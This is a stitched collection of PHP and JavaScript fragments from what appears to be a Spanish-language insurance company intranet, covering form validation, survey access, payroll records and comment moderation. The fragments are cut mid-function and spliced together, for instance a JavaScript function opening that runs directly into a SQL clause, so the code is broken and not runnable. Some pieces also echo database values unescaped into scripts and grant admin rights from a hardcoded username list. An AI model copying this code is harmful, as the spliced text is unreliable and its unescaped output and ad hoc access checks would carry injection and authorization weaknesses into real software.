$errores = true;
}
if ($_POST["cantidadEmpleados"] == "") {
echo "errores+= '- El campo Cantidad de Empleados es obligatorio.<br />';";
$errores = true;
}
if ($_POST["cantidadEmpleados"] != "") {
if (!validarEntero($_POST["cantidadEmpleados"])) {
echo "errores+= '- El campo Cantidad de Empleados debe ser mayor o igual a 0.<br />';";
$errores = true;
}
}
if ($_POST["masaSalarial"] != "") {
if (!validarNumero($_POST["masaSalarial"])) {
echo "errores+= '- El campo Masa Salarial es inválido.<br />';";
$errores = true;
}
}
if ($_POST["superficie"] != "") {
if (!validarNumero($_POST["superficie"])) {
echo "errores+= '- El campo Superficie es inválido.<br />';";
$errores = true;
}
if (intval($_POST["superficie"]) < 0) {
echo "errores+= '- La Superficie debe ser mayor o igual a 0.<br />';";
$errores = true;
}
if (intval($_POST["superficie"]) > 999999) {
echo "errores+= '- La Superficie debe ser inferior a 1.000.000.<br />';";
$errores = true;
}
}
if (($_POST["tipoEstablecimiento"] == "O") and ($_POST["fechaFinObra"] == "")) {
echo "errores+= '- El campo Fecha de Finalización de la Obra es obligatorio.<br />';";
$errores = true;
}
if ($_POST["fechaFinObra"] != "") {
if (!isFechaValida($_POST["fechaFinObra"])) {
echo "errores+= '- La Fecha de Finalización de la Obra es inválida.<br />';";
$errores = true;
}
if (dateDiff(date("d/m/Y"), $_POST["fechaFinObra"]) < 0) {
echo "errores+= '- La Fecha de Finalización de la Obra no puede ser anterior al día de hoy.<br />';";
$errores = true;
}
}
if ($_POST["codigoArea"] != "")
if (!validarEntero($_POST["codigoArea"])) {
echo "errores+= '- El campo Teléfono Laboral debe ser numérico.<br />';";
$errores = true;
}
if ($_POST["telefono"] != "")
if (!validarEntero($_POST["telefono"])) {
echo "errores+= '- El campo Teléfono Laboral debe ser numérico.<br />';";
$errores = true;
}
if ($_POST["interno"] != "")
if (!validarEntero($_POST["interno"])) {
echo "errores+= '- El campo Interno debe ser numérico.<br />';";
$errores = true;
}
if ($_POST["codigoAreaFax"] != "")
if (!validarEntero($_POST["codigoAreaFax"])) {
echo "errores+= '- El campo Fax debe ser numérico.<br />';";
$errores = true;
}
if ($_POST["fax"] != "")
if (!validarEntero($_POST["fax"])) {
echo "errores+= '- El campo Fax debe ser numérico.<br />';";
$errores = true;
}
if ($_POST["calle"] == "") {
echo "errores+= '- Debe cargar el domicilio.<br />';";
$errores = true;
}
$params = array(":idsolicitud" => $_POST["idSolicitud"],
":calle" => $_POST["calle"],
":numero" => $_POST["numero"],
":piso" => $_POST["piso"],
":departamento" => $_POST["departamento"]);
$sql =
"SELECT 1
FROM ase_solicitudestablecimiento
WHERE se_idsolicitud = :idsolicitud
AND UPPER(se_calle) = UPPER(:calle)
AND UPPER(se_numero) = UPPER(:numero)
AND UPPER(NVL(se_piso, ' ')) = UPPER(:piso)
AND UPPER(NVL(se_departamento, ' ')) = UPPER(:departamento)";
if ($_POST["id"] > 0) {
$params[":id"] = $_POST["id"];
$sql.= " AND se_id <> :id";
}
if (ExisteSql($sql, $params)) {
echo "errores+= '- Ya existe un establecimiento con ese Domicilio.<br />';";
$errores = true;
}
if ($errores) {
echo "getElementById('errores').innerHTML = errores;";
echo "getElementById('divErrores').style.display = 'inline';";
echo "getElementById('foco').style.display = 'block';";
echo "getElementById('foco').focus();";
echo "getElementById('foco').style.display = 'none';";
}
else {
echo "getElementById('divErrores').style.display = 'none';";
}
echo "}";
echo "</script>";
return !$errores;
}
SetDateFormatOracle("DD/MM/YYYY");
$usuario = GetWindowsLoginName(true);
$sql = "SELECT TO_CHAR(SYSDATE, 'YYYYMM') FROM DUAL";
$sql = "SELECT tb_codigo FROM art.ctb_tablas WHERE tb_clave = 'C_INT'";
$periodo = ValorSql($sql);
$params = array(":anio" => $periodo, ":usuario" => $usuario);
$sql =
"SELECT 1
FROM web.weu_encuesta_usuario
WHERE eu_anio = :anio
AND eu_fechabaja IS NULL
AND eu_usuario = :usuario";
$usuarioHabilitado = ExisteSql($sql, $params);
if (!$usuarioHabilitado) {
?>
<script>
with (window.parent.document) {
getElementById('divEncuesta').innerHTML = '<h1 style="color:#f00; margin-top:80px;">ACCESO DENEGADO</h1><h3>Usted no tiene encuestas para completar.</h3>';
getElementById('divPaso1').style.display = 'none';
getElementById('divPaso2').style.display = 'block';
}
</script>
<?
return false;
}
$sb = false;
if (isset($_REQUEST["sb"]))
if ($_REQUEST["sb"] == "T")
$sb = true;
$habilitarEmpresa = "";
$params = array(":id" => $_SESSION["idUsuario"]);
$sql =
"SELECT 1
FROM rrhh.dpl_login
WHERE pl_id = :id
AND pl_mail IN ('*****@*****.**')";
if (!ExisteSql($sql, $params))
$habilitarEmpresa = "DISABLED";
?>
<html>
<head>
<link rel="stylesheet" href="/js/popup/dhtmlwindow.css" type="text/css" />
<link rel="stylesheet" href="/modules/evaluacion_puesto/abm_descripcion_de_puesto/css/style.css" type="text/css" />
<script language="JavaScript" src="/js/functions.js"></script>
<script language="JavaScript" src="/js/grid.js"></script>
<script language="JavaScript" src="/js/validations.js"></script>
<script src="/js/popup/dhtmlwindow.js" type="text/javascript"></script>
<script language="JavaScript" src="/modules/evaluacion_puesto/abm_descripcion_de_puesto/js/usuarios.js"></script>
<script type="text/javascript">
divWin = null;
function showAlta(item) {
AND dpl1.pl_id = :id";
$stmt = DBExecSql($conn, $sql, $params);
$row = DBGetQuery($stmt);
$administrador = ($row["PL_ADMINISTRADOR"] == "T")?"CHECKED":"";
$referente = ($row["PL_REFERENTE"] == "S")?"CHECKED":"";
}
$empresa = $_SESSION["idEmpresa"];
$habilitarEmpresa = "";
$params = array(":id" => $_SESSION["idUsuario"]);
$sql =
"SELECT 1
FROM rrhh.dpl_login
WHERE pl_id = :id
AND pl_mail IN ('*****@*****.**')";
$esSuperUsuario = ExisteSql($sql, $params);
if (($esSuperUsuario) and (isset($row["PL_EMPRESA"])))
$empresa = $row["PL_EMPRESA"];
if (!$esSuperUsuario)
$habilitarEmpresa = "DISABLED";
?>
<html>
<head>
<link rel="stylesheet" href="/js/popup/dhtmlwindow.css" type="text/css" />
<script language="JavaScript" src="/js/functions.js"></script>
<script language="JavaScript" src="/js/validations.js"></script>
<script type="text/javascript" src="/js/popup/dhtmlwindow.js"></script>
<script language="JavaScript" src="/modules/evaluacion_puesto/abm_descripcion_de_puesto/js/usuarios.js"></script>
<!-- INICIO CALENDARIO.. -->
<style type="text/css">@import url(/js/Calendario/calendar-system.css);</style>
<script type="text/javascript" src="/js/Calendario/calendar.js"></script>
function saveRespuesta($idEncuesta, $idPregunta, $idOpcion, $observaciones)
{
// Inserta o actualiza la respuesta según corresponda..
$params = array(":idpregunta" => $idPregunta, ":idopcion" => $idOpcion, ":usuario" => GetUserID());
$sql = "SELECT 1\n\t\t\t FROM rrhh.rrp_respuestaspreguntas\n\t\t\tWHERE rp_idpregunta = :idpregunta\n\t\t\t\tAND rp_idopcion = :idopcion\n\t\t\t\tAND rp_usuario = :usuario";
if (!ExisteSql($sql, $params)) {
$error = insertRespuesta($idEncuesta, $idPregunta, $idOpcion, $observaciones);
} else {
$error = updateRespuesta($idEncuesta, $idPregunta, $idOpcion, $observaciones);
}
}
$refrigerio = "F";
if (isset($_POST["refrigerio"]))
$refrigerio = "T";
$viaticos = "F";
if (isset($_POST["viaticos"]))
$viaticos = "T";
$params = array(":contrato" => $_SESSION["contrato"], ":periodo" => $_POST["periodoProcesado"]);
$sql =
"SELECT 1
FROM emi.icr_conceptoremunerativo
WHERE cr_contrato = :contrato
AND cr_periodo = :periodo";
if (ExisteSql($sql, $params)) {
$_POST["esAlta"] = "F";
$_POST["esModificacion"] = "T";
}
if ($_POST["esAlta"] == "T") {
$params = array(":antiguedad" => $antiguedad,
":bonus" => $bonus,
":contrato" => $_SESSION["contrato"],
":otros" => $otrosConceptos,
":periodo" => $_POST["periodoProcesado"],
":premios" => $premios,
":presentismo" => $presentismo,
":refrigerio" => $refrigerio,
":usualta" => $_SESSION["idUsuario"],
":viaticos" => $viaticos);
</table>
</td>
</tr>
</table>
</div>
</form>
<script>
<?
$params = array(":usuario" => GetUserID());
$sql =
"SELECT 1
FROM rrhh.rrp_respuestaspreguntas
WHERE rp_idencuesta = 1
AND rp_usuario = :usuario
AND rp_fechabaja IS NULL";
if ((ExisteSql($sql, $params)) and (!isset($_REQUEST["std"]))) {
?>
document.getElementById('tableYaVoto').style.display = 'block';
document.getElementById('tablePreguntas').style.display = 'none';
document.getElementById('tableAgradecimiento').style.display = 'none';
<?
}
else {
?>
document.getElementById('tableYaVoto').style.display = 'none';
document.getElementById('table1').style.display = 'block';
document.getElementById('tablePreguntas').style.display = '<?php
echo !isset($_REQUEST["std"]) ? "block" : "none";
?>
';
document.getElementById('tableAgradecimiento').style.display = '<?php
function transaccionConErrores($seqTrans) {
global $conn;
$params = array(":transaccion" => $seqTrans);
$sql =
"SELECT 1
FROM tmp.teop_errororganismopublico
WHERE te_transaccion = :transaccion";
return ExisteSql($sql, $params, 0);
}
function IsPublicPage($paginaId) {
$params = array(":id" => $paginaId);
$sql =
"SELECT 1
FROM web.wpi_paginasintranet
WHERE pi_id = :id
AND pi_privada = 'F'";
return ExisteSql($sql, $params);
}
WHERE em_cuit = :cuit
ORDER BY 1 DESC";
$razonSocial = ValorSql($sql, "", $params);
// Validación 6.. Tiene que ir debajo de la llamada a import_from_srt.php..
$params = array(":cuit" => $_REQUEST["cuit"]);
$sql =
"SELECT 1
FROM srt.sem_empresas e JOIN srt.shv_historialvigencias v ON v.hv_id = art.cotizacion.get_idultimavigencia(em_cuit)
WHERE CASE
WHEN v.hv_idoperaciondesde = 10888 THEN ADD_MONTHS(v.hv_vigenciadesde, 10) + 11
ELSE ADD_MONTHS(v.hv_vigenciadesde, 6)
END <= SYSDATE
AND e.em_cuit = :cuit";
if (($row["SS_STATUS"] != -1) and ($row["SS_STATUS"] != 1) and (!ExisteSql($sql, $params, 0))) {
$msg = "[6] Esta C.U.I.T. no puede ser cotizada por la vigencia en la actual ART,\\r\\r";
$msg.= "por favor comuníquese con su Ejecutivo de Provincia ART.";
msgBox($msg);
}
?>
<script type="text/javascript">
with (window.parent.document) {
// Asigno el nombre que devuelve la SRT..
getElementById('razonSocial').value = '<?php
echo $razonSocial;
?>
';
try {
if ((getElementById('statusSrtTmp').value == 2) && (getElementById('artTmp').value == 51))
if (DBGetRecordCount($stmt) == 0) {
?>
<script>
parent.divWin.close();
alert('Este artículo aún no tiene comentarios.');
</script>
<?
}
$params = array(":usuario" => GetWindowsLoginName());
$sql =
"SELECT 1
FROM use_usuarios
WHERE se_usuario IN ('ALAPACO', 'AANGIOLILLO', 'JSANTORO', 'NPEREIRA')
AND UPPER(se_usuario) = UPPER(:usuario)";
$esAdmin = ExisteSql($sql, $params);
?>
<html>
<head>
<script>
<?
if ($esAdmin) {
?>
function eliminarComentario(id) {
if (confirm('¿ Realmente desea eliminar este comentario ?'))
document.getElementById('iframeComentarios').src = '/functions/save_comment.php?baja=s&id=' + id;
}
<?
}
?>
</script>